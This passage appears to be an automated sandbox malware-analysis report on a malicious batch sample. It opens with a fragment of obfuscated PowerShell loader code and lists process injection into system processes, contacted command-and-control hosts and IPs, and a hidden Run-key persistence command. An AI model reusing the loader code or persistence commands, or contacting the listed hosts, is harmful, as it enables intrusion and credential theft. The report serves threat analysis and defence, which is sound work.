structor(''+[char](82)+''+[char](84)+''+'s'+''+'p'+''+[char](101)+''+'c'+''+[char](105)+''+[char](97)+''+'l'+''+[char](78)+''+[char](97)+''+[char](109)+'e,'+'h'+''+'i'+''+[char](100)+''+'e'+''+[char](66)+''+'y'+'s'+[char](105)+''+'g'+''+','+''+[char](80)+'u'+[char](98)+''+'l'+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$yflwifejwhebpy).setimplementationflags(''+[char](82)+''+[char](117)+''+'n'+''+[char](116)+''+[char](105)+'me,m'+[char](97)+''+'n'+''+'a'+''+[char](103)+''+'e'+'d');$ymlvqpdcphk.definemethod(''+'i'+''+'n'+'v'+[char](111)
+'k'+[char](101)+'',''+'p'+''+'u'+''+'b'+'li'+'c'+''+','+''+'h'+''+[char](105)+''+[char](100)+'e'+[char](66)+'y'+'s'+''+[char](105)+''+'g'+''+[char](44)+''+[char](78)+''+'e'+''+'w'+''+[char](83)+''+'l'+'o'+[char](116)+','+'v'+''+[char](105)+''+[char](114)+''+'t'+''+[char](117)+''+'a'+''+[char](108)+'',$nxinipbkxv,$yflwifejwhebpy).setimplementationflags(''+[char](82)+'unt'+[char](105)+''+[char](109)+''+[char](101)+''+','+''+[char](77)+''+'a'+''+'n'+'a'+[char](103)+''+'e'+''+[char](100)+'');write-output $ymlvqpdcphk.createtype();}$tbozpeexdclpo=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+'st'+'e'+''+'m'+''+'.'+''+[char](100)+'l'+'l'+'')}).gettype(''+[char](77)+'icr'+'o'+''+'s'+''+'o'+''+[char](102)+''+[char](116)+''+[char](46)+''+'w'+''+[char](105)+'n'+[char](51)+''+'2'+''+[char](46)+''+[char](85)+''+[char](110)+''+[char](115)+'af'+[char](101)+''+[char](78)+'a'+[char](116)+''+'i'+''+'v'+''+'e'+'met'+[char](104)+''+'o'+''+[c
Source: C:\Windows\System32\dllhost.exe; Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,38_2_0000000140002300
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: IProgram Manager
Source: dwm.exe, 0000002A.00000000.2786292411.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000002A.00000002.3476487461.000001D159439000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Program Manager
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
Source: C:\Windows\System32\cmd.exe; Code function: 17_3_00000253FC3E2AF0 cpuid 17_3_00000253FC3E2AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-FHOIapsb VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-FHOIapsb VolumeInformation
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,38_2_0000000140002300
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC408090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,17_2_00000253FC408090
Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.49.dr, Amcache.hve.11.drBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
MITRE ATT&CK Matrix (interactive navigator; the cell layout and per-cell signature counts did not survive extraction)

Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact

Techniques marked with at least one signature hit (counts not recoverable):
  • Scripting
  • Windows Management Instrumentation
  • Native API
  • PowerShell
  • Command and Scripting Interpreter
  • Scheduled Task/Job
  • Registry Run Keys / Startup Folder
  • DLL Side-Loading
  • Access Token Manipulation
  • Process Injection
  • Deobfuscate/Decode Files or Information
  • Obfuscated Files or Information
  • Software Packing
  • File Deletion
  • Rootkit
  • Masquerading
  • Modify Registry
  • Hidden Files and Directories
  • Virtualization/Sandbox Evasion
  • Credential API Hooking
  • Input Capture
  • System Time Discovery
  • File and Directory Discovery
  • System Information Discovery
  • Security Software Discovery
  • Process Discovery
  • Application Window Discovery
  • System Network Configuration Discovery
  • Archive Collected Data
  • Ingress Tool Transfer
  • Encrypted Channel
  • Non-Standard Port
  • Non-Application Layer Protocol
  • Application Layer Protocol
Behavior Graph ID: 1524982 | Sample: rbx-CO2.bat | Startdate: 03/10/2024 | Architecture: WINDOWS | Score: 100

Network contacted (from the start node): azure-winsecure.com; ipwho.is

Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); .NET source code references suspicious native API functions; 15 other signatures

Process tree (numbers in brackets are the graph's node ids):
  • [13] cmd.exe (started)
    Signatures: Suspicious powershell command line found; Suspicious command line found
    • [18] powershell.exe (started)
      Dropped files: C:\Windows\...\$rbx-CO2.bat:Zone.Identifier (ASCII); C:\Windows\$rbx-onimai2\$rbx-CO2.bat (ASCII)
      Signatures: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Uses schtasks.exe or at.exe to add and modify task schedules; 4 other signatures
      • [32] cmd.exe (started)
        Signatures: Suspicious powershell command line found
        • [45] powershell.exe (started)
          • [51] cmd.exe (started)
            Signatures: Suspicious powershell command line found; Suspicious command line found
            • [54] powershell.exe (started)
              Network: azure-winsecure.com 154.216.20.132, ports 59172, 6969 (SKHT-ASShenzhenKatherineHengTechnologyInformationCo, Seychelles); ipwho.is 147.135.36.89, ports 443, 59173 (OVHFR, United States)
              Signatures: Creates autostart registry keys with suspicious values (likely registry only malware); Creates autostart registry keys with suspicious names; Creates an autostart registry key pointing to binary in C:\Windows; 6 other signatures
              • [64] powershell.exe (started)
                Signatures: Injects a PE file into a foreign processes
                • [73] conhost.exe (started); [75] powershell.exe (started); [77] powershell.exe (started)
              • [67] schtasks.exe (started)
                Signatures: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                • [79] conhost.exe (started)
              • [69] WerFault.exe (started); [71] WerFault.exe (started)
            • [58] WMIC.exe (started); [60] conhost.exe (started); [62] 4 other processes (started)
        • [47] conhost.exe (started); [49] cmd.exe (started)
      • [35] WerFault.exe (started)
    • [22] WMIC.exe (started); [24] WMIC.exe (started); [30] 4 other processes (started)
  • [16] powershell.exe (started)
    Signatures: Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes
    • [26] dllhost.exe (started)
      Signatures: Injects code into the Windows Explorer (explorer.exe); Contains functionality to inject code into remote processes; Writes to foreign memory regions; 3 other signatures
      • [37] lsass.exe (injected)
        Signatures: Writes to foreign memory regions
      • [39] winlogon.exe (injected); [41] svchost.exe (injected); [43] 19 other processes (injected)
    • [28] conhost.exe (started)

Antivirus detection

Source | Detection | Scanner | Label | Link
rbx-CO2.bat | 0% | ReversingLabs | - | -

Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe | -
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe | -
https://go.micro | 0% | URL Reputation | safe | -
https://contoso.com/License | 0% | URL Reputation | safe | -
https://contoso.com/Icon | 0% | URL Reputation | safe | -
http://upx.sf.net | 0% | URL Reputation | safe | -
https://aka.ms/pscore6 | 0% | URL Reputation | safe | -
http://schemas.xmlsoap.org/ws/2005/02/trust | 0% | URL Reputation | safe | -
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe | -
https://contoso.com/ | 0% | URL Reputation | safe | -
https://nuget.org/nuget.exe | 0% | URL Reputation | safe | -
https://aka.ms/pscore68 | 0% | URL Reputation | safe | -
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | URL Reputation | safe | -
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | -
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipwho.is | 147.135.36.89 | true | false | - | unknown
azure-winsecure.com | 154.216.20.132 | true | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://ipwho.is/ | false | - | unknown
URLs from memory and binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.2649694624.000001D4A93CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4C31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://go.micro | powershell.exe, 00000024.00000002.2775061134.000001B4A5B64000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft.co.1mmi | powershell.exe, 00000019.00000002.3432949177.0000021404730000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
https://contoso.com/License | powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.11.dr | false | URL Reputation: safe | unknown
https://aka.ms/pscore6 | powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, Null.25.dr, Null.8.dr | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000024.00000002.2775061134.000001B4A4C4C000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 00000028.00000000.2769294113.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3406704355.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/wsdl/ | lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.2649694624.000001D4A93CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3001705922.000001B4B4A8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6xG | powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/wsdl/soap12/P | lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://Passport.NET/tb | Microsoft-Windows-LiveId%4Operational.evtx.49.dr | false | - | unknown
https://aka.ms/pscore68 | powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2775061134.000001B4A4A21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 00000028.00000000.2769294113.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3406704355.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp | false | - | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 00000028.00000002.3405683588.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2769244391.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000008.00000002.2406288380.000001D499341000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3449074236.0000021404D91000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2775061134.000001B4A4A21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
Contacted public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
147.135.36.89 | ipwho.is | United States | 16276 | OVHFR | false
154.216.20.132 | azure-winsecure.com | Seychelles | 135357 | SKHT-ASShenzhenKatherineHengTechnologyInformationCo | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1524982
Start date and time: 2024-10-03 14:52:51 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 20
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rbx-CO2.bat
Detection: MAL
Classification: mal100.spyw.evad.winBAT@56/86@2/2
EGA Information:
  • Successful, ratio: 85.7%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 54
  • Number of non-executed functions: 301
Cookbook Comments:
  • Found application associated with file extension: .bat
  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 52.168.117.172, 20.189.173.21, 20.42.65.92
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus07.eastus.cloudapp.azure.com, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target powershell.exe, PID 4044 because it is empty
  • Not all processes were analyzed; the report is missing behavior information
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtFsControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • VT rate limit hit for: rbx-CO2.bat
Time | Type | Description
08:53:42 | API Interceptor | 4x Sleep call for process: WMIC.exe modified
08:53:48 | API Interceptor | 55783x Sleep call for process: powershell.exe modified
08:53:56 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
08:55:18 | API Interceptor | 562x Sleep call for process: winlogon.exe modified
08:55:19 | API Interceptor | 508x Sleep call for process: lsass.exe modified
08:55:19 | API Interceptor | 4715x Sleep call for process: svchost.exe modified
08:55:20 | API Interceptor | 452x Sleep call for process: dwm.exe modified
08:55:28 | API Interceptor | 206x Sleep call for process: cmd.exe modified
08:55:28 | API Interceptor | 206x Sleep call for process: conhost.exe modified
08:55:33 | API Interceptor | 129x Sleep call for process: dllhost.exe modified
14:54:55 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
14:55:04 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Joe Sandbox View / Context: IPs

Match | Associated Sample Name / URL | Detection | Threat Name | Context
147.135.36.89 | XS3sNotzzw.exe | malicious | Unknown | /?output=json
147.135.36.89 | XS3sNotzzw.exe | malicious | Unknown | /?output=json
154.216.20.132 | SC.cmd | malicious | Unknown | -
154.216.20.132 | 1.cmd | malicious | Unknown | -
154.216.20.132 | 2.cmd | malicious | Unknown | -
154.216.20.132 | download_2.exe | malicious | Quasar | -

Joe Sandbox View / Context: Domains

Match | Associated Sample Name / URL | Detection | Threat Name | Context
azure-winsecure.com | SC.cmd | malicious | Unknown | 154.216.20.132
azure-winsecure.com | 1.cmd | malicious | Unknown | 154.216.20.132
azure-winsecure.com | 2.cmd | malicious | Unknown | 154.216.20.132
azure-winsecure.com | download_2.exe | malicious | Quasar | 154.216.20.132
ipwho.is | SC.cmd | malicious | Unknown | 195.201.57.90
ipwho.is | 1.cmd | malicious | Unknown | 108.181.98.179
ipwho.is | 2.cmd | malicious | Unknown | 195.201.57.90
ipwho.is | download_2.exe | malicious | Quasar | 147.135.36.89
ipwho.is | MZs41xJfcH.exe | malicious | PureLog Stealer, Quasar, zgRAT | 195.201.57.90
ipwho.is | N5mRSBWm8P.exe | malicious | Quasar | 195.201.57.90
ipwho.is | Pedido09669281099195.com.exe | malicious | DarkTortilla, Quasar | 195.201.57.90
ipwho.is | mtgjyX9gHF.exe | malicious | Quasar | 108.181.98.179
ipwho.is | SecuriteInfo.com.BackDoor.QuasarNET.3.14065.23993.exe | malicious | Quasar | 195.201.57.90
ipwho.is | http://ufvskbzrquea.pages.dev/ | malicious | TechSupportScam | 195.201.57.90

Joe Sandbox View / Context: ASNs

Match | Associated Sample Name / URL | Detection | Threat Name | Context
OVHFR | download_2.exe | malicious | Quasar | 147.135.36.89
OVHFR | N5mRSBWm8P.exe | malicious | Quasar | 51.79.73.224
OVHFR | xw5bGXSmtz.exe | malicious | RedLine | 164.132.72.186
OVHFR | xw5bGXSmtz.exe | malicious | RedLine | 164.132.72.186
OVHFR | zd4TQmKNAd.exe | malicious | RedLine | 54.38.123.247
OVHFR | novo.ppc.elf | malicious | Mirai, Moobot | 151.80.39.149
OVHFR | novo.x86_64.elf | malicious | Mirai, Moobot | 137.74.25.241
OVHFR | https://546546546.pages.dev/qweqr?msharing=service@jpplus.com | malicious | HTMLPhisher | 51.83.2.241
OVHFR | file.exe | malicious | Unknown | 94.23.66.84
OVHFR | PO#001498.exe | malicious | FormBook | 5.39.10.93
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | SC.cmd | malicious | Unknown |
                                        • 154.216.20.132
                                        RICHIESTA_OFFERTA_RDO2400423.docx.docGet hashmaliciousGuLoaderBrowse
                                        • 154.216.20.22
                                        1.cmdGet hashmaliciousUnknownBrowse
                                        • 154.216.20.132
                                        2.cmdGet hashmaliciousUnknownBrowse
                                        • 154.216.20.132
                                        download_2.exeGet hashmaliciousQuasarBrowse
                                        • 154.216.20.132
                                        New order02102024.docGet hashmaliciousNanocoreBrowse
                                        • 154.216.20.22
